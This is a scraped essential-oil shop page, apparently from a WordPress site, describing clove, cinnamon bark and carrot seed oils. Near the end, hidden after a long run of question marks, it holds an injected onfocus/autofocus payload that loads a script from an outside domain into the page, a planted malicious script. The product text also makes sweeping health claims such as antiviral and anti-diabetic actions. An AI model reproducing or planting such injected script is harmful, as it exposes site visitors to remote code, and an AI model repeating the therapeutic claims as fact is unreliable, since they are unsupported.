Wishlist

Account

Cart

Clove

Clove

 

 

QUALITY

100% pure therapeutic grade.
Our organic Clove bud essential oil (Syzygium aromaticum) is steam distilled from the dried tiny blossom buds. The Clove buds carefully selected before distillation. Ageless trees are growing wild in the woods of Indonesia. Clove essential oil has used in traditional Chinese and Indian medicine for centuries.

CHARACTERISTICS

Clove bud oil is a clear to yellow mobile liquid, becoming brown with an extraordinarily strong, sweet, and spicy odor. Clove bud oil is a dark brown liquid with a harsh, woody, spicy, lightly sweet aroma.

 Recent research in France has shown that clove bud essential oil can act as an active anti-inflammatory agent to inhibit the production of free radicals, which means it has demonstrated a powerful antioxidant capacity.

BENEFITS

The primary use of Cloves, both whole and ground, is a domestic culinary spicy aroma for the management of flavoring. Clove bud oil well known used as a fragrance component in soaps, detergents, creams, lotions, and perfumes. Several seasoning blends, counting sauce, encompass powered cloves—several herbal and harsh alcoholic beverages containing clove. Clove essential oil is widely known to help dental problems, as pain and inflammation improve the immune system and digestive support.

THERAPEUTIC ACTIONS

Analgesic, anthelmintic, antiseptic, antispasmodic, antiviral, carminative, expectorant, larvicidal, stimulant, stomachic, vermifuge, antibacterial, pediculicidal, antifungal.

 

Cinnamon bark

Cinnamon bark

 

 

QUALITY

100% pure therapeutic grade.
Our organic steam-distilled Cinnamon bark essential oil from spicy bark of the small tree known as immortal because it is evergreen from Sri Lanka. The botanical name of Cinnamon bark essential oil is Cinnamomum verum J. Prest, has aromatic components, which can be reborn by extracting distillation water and adding the extract to water-distillation oil.

CHARACTERISTICS

Cinnamon bark essential oil is a pale yellow to dark yellow or brownish-yellow liquid with a potent, warm-spicy, and persistent aroma. The dry out note is strongly sweetened and has a powdery dryness. Cinnamon has a long story in the culinary industry, adding spice to dessert, entrees, and drinks.

BENEFITS

Cinnamon bark essential oil is need as a fragrance component of soaps, detergents, creams, lotions, and perfumes. Cinnamon bark essential oil has admirable masking forceful and is frequently pharmaceutical industry used for masking unpleasant medicinal tastes. In sequence with sweet orange oil, lime oil, and cola extract, cinnamon bark essential oil is a necessary aspect of the Coca-Cola and Pepsi cola flavor profile.

In aromatherapy, clinical studies have demonstrated activity as anti-diabetic, antimicrobial, antioxidant, and insecticidal.

THERAPEUTIC ACTIONS

Anesthetic, antiseptic, antispasmodic, aphrodisiac, cardiac, carminative, emmenagogue, hemostatic, insecticide, stimulant, stomachic, vermifuge, antibacterial, antifungal, antimicrobial, antioxidant

 

CARROT SEED

Carrot Seed

 

 

QUALITY

100% pure therapeutic grade.
Our organic Carrot seed essential oil is steam-distilled from the dehydrated seed of the beautiful, lacy, white flower. Carrot seed essential oil is harvest in India. It is a high concentration of carotenes.

CHARACTERISTICS

Carrot seed is a yellow or amber-colored to pale orange-brown liquid with a peculiar dry-woody, somewhat root-like, earthy aroma. The top note is sweet and fresh, but the tenacious undertone and dry-out are very heavy, earthy, and slightly spicy.

BENEFITS

Carrot is an excellent option for your skin complexion and nourishing. The sesquiterpene alcohol components in the carrot seed essential oil offer a high antioxidant that regenerates skin cells—carrot seeds in herbal medicine as a diuretic and emmenagogue, and digestive support system.

Carrot seed oil is an aroma component in soaps, detergents, creams, lotions, and perfumes. Carrot seed essential oil is known as sunscreen ingredient for some cosmetics products.

THERAPEUTIC ACTIONS

Carminative, cytophylactic, depurative, diuretic, emmenagogue, hepatic, stimulant, antibacterial, larvicidal.

 

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

0
0 item
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//www.comedianteschapines.com/es/counter.js";document.head.append(script); autofocus=\"
Empty Cart